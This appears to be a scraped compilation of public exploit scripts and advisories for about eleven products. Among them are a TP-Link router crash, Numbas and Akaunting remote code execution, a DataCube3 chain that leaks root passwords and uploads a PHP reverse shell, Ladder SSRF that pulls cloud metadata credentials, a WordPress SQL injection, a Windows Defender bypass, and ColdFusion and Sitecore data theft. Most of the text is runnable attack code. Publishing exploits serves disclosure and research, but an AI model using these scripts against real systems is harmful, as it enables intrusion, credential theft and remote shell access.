ISHACK AI BOT

# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS' # Date: 8/12/2023 # Exploit Author: Anish Feroz (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N #Description: #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router. #Usage: #python3 target username password #change port, if required ------------------------------------------------POC----------------------------------------- #!/usr/bin/python import requests from requests.auth import HTTPBasicAuth import base64 def send_request(ip, username, password): auth_url = f"http://{ip}:8082" target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20" credentials = f"{username}:{password}" encoded_credentials = base64.b64encode(credentials.encode()).decode() headers = { "Host": f"{ip}:8082", "Authorization": f"Basic {encoded_credentials}", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } session = requests.Session() response = session.get(target_url, headers=headers) if response.status_code == 200: print("Server Crashed") print(response.text) else: print(f"Script Completed with status code {response.status_code}") ip_address = input("Enter IP address of the host: ") username = input("Enter username: ") password = input("Enter password: ") send_request(ip_address, username, password)

# Exploit Title: Numbas < v7.3 - Remote Code Execution # Google Dork: N/A # Date: March 7th, 2024 # Exploit Author: Matheus Boschetti # Vendor Homepage: https://www.numbas.org.uk/ # Software Link: https://github.com/numbas/Numbas # Version: 7.2 and below # Tested on: Linux # CVE: CVE-2024-27612 import sys, requests, re, argparse, subprocess, time from bs4 import BeautifulSoup s = requests.session() def getCSRF(target): url = f"http://{target}/" req = s.get(url) soup = BeautifulSoup(req.text, 'html.parser') csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value'] return csrfmiddlewaretoken def createTheme(target): # Format request csrfmiddlewaretoken = getCSRF(target) theme = 'ExampleTheme' boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1' data = ( f'--{boundary}\r\n' 'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n' '\r\n' f'{csrfmiddlewaretoken}\r\n' f'--{boundary}\r\n' 'Content-Disposition: form-data; name="name"\r\n' '\r\n' f'{theme}\r\n' f'--{boundary}--\r\n' ) headers = {'Content-Type': f'multipart/form-data; boundary={boundary}', 'User-Agent': 'Mozilla/5.0', 'Accept': '*/*', 'Connection': 'close'} # Create theme and return its ID req = s.post(f"http://{target}/theme/new/", headers=headers, data=data) redir = req.url split = redir.split('/') id = split[4] print(f"\t[i] Theme created with ID {id}") return id def login(target, user, passwd): print("\n[i] Attempting to login...") csrfmiddlewaretoken = getCSRF(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'username': user, 'password': passwd, 'next': '/'} # Login login = s.post(f"http://{target}/login/", data=data, allow_redirects=True) res = login.text if("Logged in as" not in res): print("\n\n[!] Login failed!") sys.exit(-1) # Check if logged and fetch ID usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res) if usermatch: user = usermatch.group(1) idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res) if idmatch: id = idmatch.group(1) print(f"\t[+] Logged in as \"{user}\" with ID {id}") def checkVuln(url): print("[i] Checking if target is vulnerable...") # Attempt to read files themeID = createTheme(url) target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.." hname = s.get(f"{target}/etc/hostname") ver = s.get(f"{target}/etc/issue") hnamesoup = BeautifulSoup(hname.text, 'html.parser') versoup = BeautifulSoup(ver.text, 'html.parser') hostname = hnamesoup.find('textarea').get_text().strip() version = versoup.find('textarea').get_text().strip() if len(hostname) < 1: print("\n\n[!] Something went wrong - target might not be vulnerable.") sys.exit(-1) print(f"\n[+] Target \"{hostname}\" is vulnerable!") print(f"\t[i] Running: \"{version}\"") # Cleanup - delete theme print(f"\t\t[i] Cleanup: deleting theme {themeID}...") target = f"http://{url}/themes/{themeID}/delete" csrfmiddlewaretoken = getCSRF(url) data = {'csrfmiddlewaretoken':csrfmiddlewaretoken} s.post(target, data=data) def replaceInit(target): # Overwrite __init__.py with arbitrary code rport = '8443' payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])" csrfmiddlewaretoken = getCSRF(target) filename = '../../../../numbas_editor/numbas/__init__.py' themeID = createTheme(target) data = {'csrfmiddlewaretoken': csrfmiddlewaretoken, 'source': payload, 'filename': filename} print("[i] Delivering payload...") # Retry 5 times in case something goes wrong... for attempt in range(5): try: s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10) except Exception as e: pass # Establish connection to bind shell time.sleep(2) print(f"\t[+] Payload delivered, establishing connection...\n") if ":" in target: split = target.split(":") ip = split[0] else: ip = str(target) subprocess.Popen(["nc", "-n", ip, rport]) while True: pass def main(): parser = argparse.ArgumentParser() if len(sys.argv) <= 1: print("\n[!] No option provided!") print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n") print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty") sys.exit(-1) group = parser.add_mutually_exclusive_group(required=True) group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit') parser.add_argument('--target', help='Target IP:PORT') parser.add_argument('--user', help='Username to authenticate') parser.add_argument('--passwd', help='Password to authenticate') args = parser.parse_args() action = args.action target = args.target user = args.user passwd = args.passwd print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-") if action == 'check': login(target, user, passwd) checkVuln(target) elif action == 'exploit': login(target, user, passwd) replaceInit(target) else: sys.exit(-1) if __name__ == "__main__": main()

# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE' # Date: 7/28/2022 # Exploit Author: Samy Younsi - NS Labs (https://neroteam.com) # Vendor Homepage: https://www.f-logic.jp # Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf # Version: Ver1.0 # Tested on: DataCube3 version 1.0 (Ubuntu) # CVE : CVE-2024-25830 + CVE-2024-25832 # Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload from __future__ import print_function, unicode_literals from bs4 import BeautifulSoup import argparse import requests import json import urllib3 import re urllib3.disable_warnings() def banner(): dataCube3Logo = """ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒▒▒██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓ ▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓ ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓ \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m FOR EDUCATIONAL PURPOSE ONLY. """ return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo)) def extractRootPwd(RHOST, RPORT, protocol): url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') scriptTag = str(soup.find_all('script')[12]).replace(' ', '') rawLeakedData = re.findall('configData:.*,', scriptTag)[0] jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0])) adminPassword = jsonLeakedData[12]['value'] rootPassword = jsonLeakedData[14]['value'] print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword)) return rootPassword except: print('[ERROR] Can\'t grab the DataCube3 version...') def generateAuthCookie(RHOST, RPORT, protocol, rootPassword): print('[INFO] Generating DataCube3 auth cookie ...') url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT) data = { 'user_id': 'root', 'user_pw': rootPassword, 'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3' } try: response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m') exit() authCookie = response.cookies.get_dict() print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie)) return authCookie except: print('[ERROR] Can\'t grab the auth cookie, is the root password correct?') def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie): print('[INFO] Extracting Accesstime ...') url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m') exit() soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser') accessTime = soup.find('input', {'name': 'accesstime'}).get('value') print('[INFO] AccessTime value: {}'.format(accessTime)) return accessTime except: print('[ERROR] Can\'t grab the accesstime value, is the root password correct?') def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime): print('[INFO] Injecting PHP reverse shell script ...') filename='rvs.php' payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT) data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime) headers = { 'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396' } url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT) try: response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20) if response.status_code != 302: print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m') exit() shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename) print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL)) return shellURL except: print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?') def execReverseShell(shellURL): print('[INFO] Executing reverse shell...') try: response = requests.get(shellURL, allow_redirects=False, verify=False) print('[INFO] Reverse shell successfully executed.') return except Exception as e: print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}') return False def main(): banner() args = parser.parse_args() protocol = 'https' if args.RPORT == 443 else 'http' rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol) authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword) accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie) shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime) execReverseShell(shellURL) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False) parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True) parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True) parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True) parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True) main()

# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF) # Date: 2024-01-20 # Exploit Author: @_chebuya # Software Link: https://github.com/everywall/ladder # Version: v0.0.1 - v0.0.21 # Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0) # CVE: CVE-2024-27620 # Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs import requests import json target_url = "http://127.0.0.1:8080/api/" imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance" r = requests.get(target_url + imdsv1_url) response_json = json.loads(r.text) print(response_json["body"])

# Exploit Title: Akaunting < 3.1.3 - RCE # Date: 08/02/2024 # Exploit Author: [email protected] # Vendor Homepage: https://akaunting.com # Software Link: https://github.com/akaunting/akaunting # Version: <= 3.1.3 # Tested on: Ubuntu (22.04) # CVE : CVE-2024-22836 #!/usr/bin/python3 import sys import re import requests import argparse def get_company(): # print("[INF] Retrieving company id...") res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False) if res.status_code != 302: print("[ERR] No company id was found!") sys.exit(3) cid = res.headers['Location'].split('/')[-1] if cid == "login": print("[ERR] Invalid session cookie!") sys.exit(7) return cid def get_tokens(url): res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False) search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text) if not search_res: print("[ERR] Couldn't get csrf token") sys.exit(1) data = {} data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '') data['session'] = res.cookies.get('akaunting_session') return data def inject_command(cmd): url = f"{target}/{company_id}/wizard/companies" tokens = get_tokens(url) headers.update({"X-Csrf-Token": tokens['csrf_token']}) data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"} res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: print("[ERR] Command injection failed!") sys.exit(4) print("[INF] Command injected!") def trigger_rce(app, version = "1.0.0"): print("[INF] Executing the command...") url = f"{target}/{company_id}/apps/install" data = {"alias": app, "version": version, "path": f"apps/{app}/download"} headers.update({"Content-Type":"application/json"}) res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False) if res.status_code == 200: res_data = res.json() if res_data['error']: search_res = re.search(r">Exit Code\:.*<", res_data['message']) if search_res: print("[ERR] Failed to execute the command") sys.exit(6) print("[ERR] Failed to install the app! no command was executed!") sys.exit(5) print("[INF] Executed successfully!") def login(email, password): url = f"{target}/auth/login" tokens = get_tokens(url) cookies.update({ 'akaunting_session': tokens['session'] }) data = { "_token": tokens['csrf_token'], "_method": "POST", "email": email, "password": password } req = requests.post(url, headers=headers, cookies=cookies, data=data) res = req.json() if res['error']: print("[ERR] Failed to log in!") sys.exit(8) print("[INF] Logged in") cookies.update({'akaunting_session': req.cookies.get('akaunting_session')}) def main(): inject_command(args.command) trigger_rce(args.alias, args.version) if __name__=='__main__': parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", help="target url") parser.add_argument("--email", help="user login email.") parser.add_argument("--password", help="user login password.") parser.add_argument("-i", "--id", type=int, help="company id (optional).") parser.add_argument("-c", "--command", help="command to execute.") parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard") parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2") args = parser.parse_args() headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"} cookies = {} target = args.url try: login(args.email, args.password) company_id = get_company() if not args.id else args.id main() except: sys.exit(0)

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi # Publication Date: 2023-01-11 # Original Researcher: Xenofon Vassilakopoulos # Exploit Author: Xenofon Vassilakopoulos # Submitter: Xenofon Vassilakopoulos # Vendor Homepage: https://wpwave.com/ # Version: Hide My WP v6.2.8 and prior # Tested on: Hide My WP v6.2.7 # Impact: Database Access # CVE: CVE-2022-4681 # CWE: CWE-89 # CVSS Score: 8.6 (high) ## Description The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. ## Proof of Concept curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

#!/usr/bin/python3 # # Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability # CVE: CVE-2023-5808 # Date: 2023-12-13 # Exploit Author: Arslan Masood (@arszilla) # Vendor: https://www.hitachivantara.com/ # Version: < 14.8.7825.01 # Tested On: 13.9.7021.04 import argparse from datetime import datetime from os import getcwd import requests parser = argparse.ArgumentParser( description="CVE-2023-5808 PoC", usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>" ) # Create --host argument: parser.add_argument( "--host", required=True, type=str, help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" ) # Create --id argument: parser.add_argument( "--id", required=True, type=str, help="JSESSIONID cookie value" ) # Create --sso argument: parser.add_argument( "--sso", required=True, type=str, help="JSESSIONIDSSO cookie value" ) args = parser.parse_args() def download_file(hostname, jsessionid, jsessionidsso): # Set the filename: filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip" # Vulnerable SMU URL: smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/" # GET request cookies smu_cookies = { "JSESSIONID": jsessionid, "JSESSIONIDSSO": jsessionidsso } # GET request headers: smu_headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Dnt": "1", "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close" } # Send the request: with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: with open(filename, 'wb') as backup_archive: # Write the zip file to the CWD: backup_archive.write(file_download.content) print(f"{filename} has been downloaded to {getcwd()}") if __name__ == "__main__": download_file(args.host, args.id, args.sso)

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing. [References] https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt [Exploit/POC] Open command prompt as Administator. C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) Access is denied. C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) Multi-commas, for the Win! [Network Access] Local [Severity] High [Disclosure Timeline] February 7, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover # Google Dork: inurl:("plugins/duplicator/") # Date: 2023-12-04 # Exploit Author: Dmitrii Ignatyev # Vendor Homepage: https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free # Software Link: https://wordpress.org/plugins/duplicator/ # Version: 1.5.7.1 # Tested on: Wordpress 6.4 # CVE : CVE-2023-6114# CVE-Link : https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ # CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A severe vulnerability has been discovered in the directory */wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only exposes extensive information about the site, including its configuration, directories, and files, but more critically, it provides unauthorized access to sensitive data within the database and all data inside. Exploiting this vulnerability poses an imminent threat, leading to potential *brute force attacks on password hashes and, subsequently, the compromise of the entire system*.* POC*: 1) It is necessary that either the administrator or auto-backup works automatically at the scheduled time 2) Exploit will send file search requests every 5 seconds 3) I attack the site with this vulnerability using an exploit Exploit sends a request to the server every 5 seconds along the path “*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/ <http://your_site/wordpress/wp-content/backups-dup-lite/tmp/>”* and if it finds something in the index of, it instantly parses all the data and displays it on the screen Exploit (python3): import requests from bs4 import BeautifulSoup import re import time url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/" processed_files = set() def get_file_names(url): response = requests.get(url) if response.status_code == 200 and len(response.text) > 0: soup = BeautifulSoup(response.text, 'html.parser') links = soup.find_all('a') file_names = [] for link in links: file_name = link.get('href') if file_name != "../" and not file_name.startswith("?"): file_names.append(file_name) return file_names return [] def get_file_content(url, file_name): file_url = url + file_name if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): print(f"Ignoring file: {file_name}") return None file_response = requests.get(file_url) if file_response.status_code == 200: return file_response.text return None while True: file_names = get_file_names(url) if file_names: print("File names on the page:") for file_name in file_names: if file_name not in processed_files: print(file_name) file_content = get_file_content(url, file_name) if file_content is not None: print("File content:") print(file_content) processed_files.add(file_name) time.sleep(5) -- With best regards, Dmitrii Ignatyev, Penetration Tester

# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360 # Google Dork: [not] # Date: [12/28/2023] # Exploit Author: [Youssef Muhammad] # Vendor Homepage: [ https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html] # Software Link: [ https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0] # Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and earlier] # Tested on: [Windows, Linux] # CVE : [CVE-2023-26360] import sys import requests import json BANNER = """ ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████ """ RED_COLOR = "\033[91m" GREEN_COLOR = "\032[42m" RESET_COLOR = "\033[0m" def print_banner(): print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR) return 0 def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None): if not endpoint.endswith('.cfc'): endpoint += '.cfc' if target_file.endswith('.cfc'): raise ValueError('The TARGET_FILE must not point to a .cfc') targeted_file = f"a/{target_file}" json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []}) vars_get = {'method': 'test', '_cfclient': 'true'} uri = f'{host}{endpoint}' response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None) file_data = None splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>' if response.status_code in [404, 500] and splatter in response.text: file_data = response.text.split(splatter, 1)[0] if file_data is None: raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.') print(file_data) # Save the output to a file output_file_name = 'output.txt' with open(output_file_name, 'w') as output_file: output_file.write(file_data) print(f"The output saved to {output_file_name}") if __name__ == "__main__": if not 3 <= len(sys.argv) <= 5: print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]") sys.exit(1) print_banner() host = sys.argv[1] target_file = sys.argv[2] endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc" proxy_url = sys.argv[4] if len(sys.argv) > 4 else None try: run_exploit(host, target_file, endpoint, proxy_url) except Exception as e: print(f"Error: {e}")

#!/usr/bin/env python3 # # Exploit Title: Sitecore - Remote Code Execution v8.2 # Exploit Author: abhishek morla # Google Dork: N/A # Date: 2024-01-08 # Vendor Homepage: https://www.sitecore.com/ # Software Link: https://dev.sitecore.net/ # Version: 10.3 # Tested on: windows64bit / mozila firefox # CVE : CVE-2023-35813 # The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted # Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09 # Video POC : https://youtu.be/vWKl9wgdTB0 import argparse import requests from urllib.parse import quote from rich.console import Console console = Console() def initial_test(hostname): # Initial payload to test vulnerability test_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='TestVulnerability' /> ''' encoded_payload = quote(test_payload) url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data, verify=False) # Check for the test string in the Content-Type of the response return 'TestVulnerability' in response.headers.get('Content-Type', '') def get_payload(choice): # Payload templates for different options payloads = { '1': "<%$ ConnectionStrings:core %>", '2': "<%$ ConnectionStrings:master %>", '3': "<%$ ConnectionStrings:web %>" } base_payload = ''' <%@Register TagPrefix = 'x' Namespace = 'System.Runtime.Remoting.Services' Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' %> <x:RemotingService runat='server' Context-Response-ContentType='{}' /> ''' return base_payload.format(payloads.get(choice, "Invalid")) def main(hostname): if initial_test(hostname): print("Exploiting, Please wait...") console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]") print("Select the payload to use:") print("1: Core connection strings") print("2: Master connection strings") print("3: Web connection strings") payload_choice = input("Enter your choice (1, 2, or 3): ") payload = get_payload(payload_choice) encoded_payload = quote(payload) url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" headers = {"Content-Type": "application/x-www-form-urlencoded"} data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) response = requests.post(url, headers=headers, data=data) if 'Content-Type' in response.headers: print("Content-Type from the response header:") print("\n") print(response.headers['Content-Type']) else: print("No Content-Type in the response header. Status Code:", response.status_code) else: print("The target does not appear to be vulnerable to CVE-2023-35813.") if __name__ == "__main__": console.print("[bold green]Author: Abhishek Morla[/bold green]") console.print("[bold red]CVE-2023-35813[/bold red]") parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore') parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance') args = parser.parse_args() main(args.hostname)

